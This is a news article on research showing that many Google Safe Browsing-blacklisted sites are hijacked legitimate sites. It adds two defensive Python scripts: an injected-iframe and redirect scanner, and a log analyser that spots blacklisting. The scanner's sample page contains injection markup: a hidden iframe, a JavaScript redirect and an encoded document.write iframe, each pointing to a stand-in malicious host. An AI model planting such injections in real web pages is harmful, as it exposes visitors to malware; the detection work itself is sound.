Google Blacklist Includes Hijacked Websites

Many of the Websites blacklisted by Google are actually legitimate Websites that have been hijacked to serve up malware, according to security firm Zscaler.

Zscaler's Julien Sobrier analyzed Alexa's list of the top one million Websites and found that 621 of them were also flagged as malicious on Google's Safe Browsing blacklist. Of those 621 sites, Sobrier found that most were legitimate Websites that had been hijacked and were serving up malicious content, such as fake antivirus software and booby-trapped PDF files, without the site owner's knowledge.

Major Web browsers, including Mozilla Firefox, Apple's Safari and Google Chrome, consult the Safe Browsing blacklist and warn users before they load a flagged Website, whether they arrive from Google's search results or by following a link elsewhere. Browsers that use Safe Browsing display an interstitial warning page advising users not to visit the blocked site. Microsoft's Internet Explorer and Opera do not use Safe Browsing at this time.

"No site is safe from hijacking," Sobrier wrote. "Personal websites and top-10,000 sites are all likely to be infected at some point."

Attack Types

According to Sobrier's analysis, the attackers usually modified the compromised page to run JavaScript code that either redirected the visitor to a malicious site or opened an iframe containing malicious content hosted elsewhere on the Web. Users are being redirected to the "same type of malicious pages that we've seen for years now, such as fake AV scareware, fake Flash updates, survey scams, etc," Sobrier wrote in a follow-up post on the ThreatLabZ blog May 18.

"That means that users are still not educated enough to recognize fake software updates and still fall for the same old tricks," he added.

Several of the sites displayed a page that "looks a lot like YouTube" and urged visitors to upgrade their installation of Adobe Flash in order to view an enticing video. Others displayed an image or a pop-up window claiming the computer was already infected with malware and urging users to download an "antivirus" program to clean up the problem. Finally, Sobrier identified sites tricking users into signing up for "free" trials or gifts by filling out page after page of online surveys.

"This type of scam [surveys] is very, very common. It's amazing that is [sic] still works," Sobrier wrote.

Sobrier noted that Safe Browsing blacklisted the hijacked site carrying the injected JavaScript or iframe, rather than the third-party domain that actually hosted the malware. This was a problem because the original source remained free to serve its malicious payload to visitors of any other site that had been hacked to point at it. Such a site, compromised but not yet blacklisted by Safe Browsing, would keep exposing users for as long as the malicious domain itself remained unblocked.
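The two injection patterns described under Attack Types, a hidden iframe pulling content from another host and inline JavaScript that redirects the visitor, are easy to hunt for in a site's own HTML. The following scanner is an added example written for this page, not code from Zscaler or from the article; the page markup, hostnames (evil-payload.example, fakeav.example, evil2.example) and the assumed site host example-store.test are all constructed for illustration. It also percent-decodes the string arguments of unescape/eval/document.write calls, since injected iframes are often written out that way rather than appearing as plain markup.

```python
import re
from urllib.parse import urlparse, unquote

# Constructed sample page: a legitimate shop page with two injected iframes
# (one percent-encoded and written out by document.write) and a JavaScript
# redirect. Hostnames are made up for illustration.
SITE_HOST = "example-store.test"
SAMPLE_HTML = """<html><head><title>Example Store</title>
<script src="/js/app.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="/widgets/weather.html" width="300" height="200"></iframe>
<iframe src="http://evil-payload.example/x.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>window.location.replace("http://fakeav.example/scan.html");</script>
<script>document.write(unescape('%3Ciframe src=%22http://evil2.example/%22 width=0 height=0%3E'));</script>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# window.location = ..., location.href = ..., location.replace(...), etc.
REDIRECT_RE = re.compile(r"\b(?:window|document|top|self|parent)\.location(?:\.href|\.replace|\.assign)?\s*[=(]")
# Calls whose string arguments are worth decoding and rescanning for markup.
INJECTOR_RE = re.compile(r"\b(?:unescape|eval|document\.write|String\.fromCharCode)\s*\(")
STRING_RE = re.compile(r"""(?:"([^"]*)"|'([^']*)')""")


def _attrs(tag):
    """Parse name=value pairs from a single HTML start tag."""
    out = {}
    for m in ATTR_RE.finditer(tag):
        out[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return out


def is_external(url, site_host):
    host = urlparse(url).hostname
    return host is not None and host.lower() != site_host


def is_hidden(attrs):
    """0x0 / 1x1 frames or CSS-hidden frames: nobody is meant to see them."""
    dim = lambda k: attrs.get(k, "").lower().rstrip("px")
    style = re.sub(r"\s+", "", attrs.get("style", "").lower())
    return (dim("width") in ("0", "1") or dim("height") in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


def scan_iframes(fragment, site_host, where):
    findings = []
    for m in IFRAME_RE.finditer(fragment):
        a = _attrs(m.group(0))
        src = a.get("src", "")
        if is_external(src, site_host) and is_hidden(a):
            findings.append((where, "hidden external iframe", src))
    return findings


def scan_html(html, site_host=SITE_HOST):
    """Return (location, finding, target URL) tuples for the page."""
    findings = scan_iframes(html, site_host, "html")
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        literals = [a or b for a, b in STRING_RE.findall(body)]
        if REDIRECT_RE.search(body):
            targets = [u for u in literals if is_external(u, site_host)]
            findings.append(("script", "javascript redirect", targets[0] if targets else "?"))
        if INJECTOR_RE.search(body):
            # Percent-decode the string arguments and look for iframes that
            # only exist once the script runs.
            decoded = "".join(unquote(s) for s in literals)
            findings.extend(scan_iframes(decoded, site_host, "script (decoded)"))
    return findings


def payload_hosts(findings):
    """Third-party hosts the page pulls from: the domains actually serving the payload."""
    return sorted({urlparse(url).hostname for _, _, url in findings if url.startswith("http")})


if __name__ == "__main__":
    for where, kind, url in scan_html(SAMPLE_HTML):
        print(f"{where:18s} {kind:24s} {url}")
    print("payload hosts:", payload_hosts(scan_html(SAMPLE_HTML)))
```

The hosts returned by payload_hosts are the ones Sobrier's point is about: Safe Browsing flags the hijacked page, so a Webmaster who finds these third-party domains in their own markup should treat them as the real source and report or block them, not just delete the injected lines. The heuristics are deliberately loose (a regex cannot follow arbitrary obfuscated JavaScript), so treat a hit as a reason to look at the file, not as proof.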

Webmasters Need to Pay Attention

Webmasters must be vigilant, according to Sobrier. Since Alexa ranks sites by traffic, the Webmasters of these sites should have noticed a significant drop in visitors shortly after being compromised and blacklisted. Only IE and Opera users would still be arriving from search engines, a pattern that should be readily apparent to anyone checking the server logs. Webmasters should invest in tools that detect traffic anomalies, alert them when the site is blacklisted, or scan the site for malicious code.
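The log check Sobrier describes can be automated: count search-engine referrals per day, split by whether the visitor's browser consults Safe Browsing, and flag the day on which referrals from Firefox, Chrome and Safari collapse while IE and Opera traffic carries on. The script below is an added example written for this page, not Zscaler's or the article's code. The log lines, addresses, dates and user-agent strings are constructed for illustration, and the browser split follows the article's statement about which browsers used Safe Browsing at the time; that set should be adjusted as browser behaviour changes.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[(\d{2}/\w{3}/\d{4})[^\]]*\] "[^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$')
SEARCH_REFERER_RE = re.compile(r"^https?://(?:www\.)?google\.[a-z.]+/", re.I)

# Browsers the article says consult Safe Browsing (at the time of writing);
# IE and Opera did not. Adjust this set as browser behaviour changes.
SAFE_BROWSING_FAMILIES = {"Firefox", "Chrome", "Safari"}


def browser_family(ua):
    """Coarse user-agent classification; order matters (Chrome UAs contain 'Safari')."""
    if "Opera" in ua or "OPR/" in ua:
        return "Opera"
    if "MSIE" in ua or "Trident/" in ua:
        return "IE"
    if "Firefox/" in ua:
        return "Firefox"
    if "Chrome/" in ua:
        return "Chrome"
    if "Safari/" in ua:
        return "Safari"
    return "Other"


def search_referrals_by_day(lines):
    """{ISO date: {'sb': hits from Safe Browsing browsers, 'non_sb': hits from others}},
    counting only requests whose referer is a Google search page."""
    counts = defaultdict(lambda: {"sb": 0, "non_sb": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        _host, stamp, _status, referer, ua = m.groups()
        if not SEARCH_REFERER_RE.match(referer):
            continue
        day = datetime.strptime(stamp, "%d/%b/%Y").date().isoformat()
        bucket = "sb" if browser_family(ua) in SAFE_BROWSING_FAMILIES else "non_sb"
        counts[day][bucket] += 1
    return dict(counts)


def blacklist_suspects(counts, min_baseline=5, drop_ratio=0.2):
    """Days on which Safe Browsing browsers' search referrals collapse (to at most
    drop_ratio of the previous day) while IE/Opera referrals keep arriving: the
    signature of a site that search engines still rank but Safe Browsing now blocks."""
    days = sorted(counts)
    flagged = []
    for prev, cur in zip(days, days[1:]):
        p, c = counts[prev], counts[cur]
        if p["sb"] >= min_baseline and c["sb"] <= p["sb"] * drop_ratio and c["non_sb"] > 0:
            flagged.append(cur)
    return flagged


# ---- constructed sample log (made-up addresses, dates and traffic) ----------
UA = {
    "Firefox": "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
    "Chrome": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24",
    "Safari": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
    "IE": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
    "Opera": "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.10",
}
GOOGLE = "http://www.google.com/search?q=example+store"


def log_line(day, referer, ua):
    return (f'203.0.113.{day} - - [{day:02d}/May/2011:10:15:32 +0000] '
            f'"GET /index.html HTTP/1.1" 200 5120 "{referer}" "{ua}"')


SAMPLE_LOG = (
    [log_line(16, GOOGLE, UA[b]) for b in ("Firefox", "Chrome", "Safari", "Firefox", "Chrome", "IE", "Opera")]
    + [log_line(17, GOOGLE, UA[b]) for b in ("Firefox", "Chrome", "Safari", "Chrome", "Firefox", "Safari", "IE", "Opera")]
    # Day 18: the site has been blacklisted; only IE and Opera users still click through.
    + [log_line(18, GOOGLE, UA[b]) for b in ("IE", "Opera", "IE")]
    # Direct and non-search traffic is not counted.
    + [log_line(18, "-", UA["Firefox"]), log_line(18, "http://news.example/", UA["Chrome"])]
)

if __name__ == "__main__":
    by_day = search_referrals_by_day(SAMPLE_LOG)
    for day in sorted(by_day):
        print(day, by_day[day])
    print("possible blacklisting on:", blacklist_suspects(by_day))
```

Run against a real access log, the same functions work on the file's lines; the thresholds (min_baseline, drop_ratio) are starting points and should be tuned to the site's normal daily volume so that a quiet weekend is not mistaken for a blacklisting.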

"Owners of these very popular websites have not invested in keeping their website safe," Sobrier said, calling his findings "disappointing."

Sobrier's findings echo a similar project by Kaspersky Lab's Stefan Tanase earlier this year. Tanase had emailed Webmasters of 100 websites infected with malware informing them of the problem. In his note, he provided some information about how the infection may have occurred, such as a weak FTP password allowing hackers to upload a malicious script, or modify an existing file. In return, he asked for some data on the infections in the form of log entries. When no one responded to his request, he reached out to another 200, and finally got six replies.

One of the responses was from a Webmaster who was no longer actively maintaining the site because it was part of an older project and was no longer in use, Tanase said during his presentation at the Kaspersky Lab Security Analyst Summit in February.

"The assumption I made is that webmasters don’t know their sites are infected," Tanase said. "The reality is that webmasters don’t care if their sites are infected."
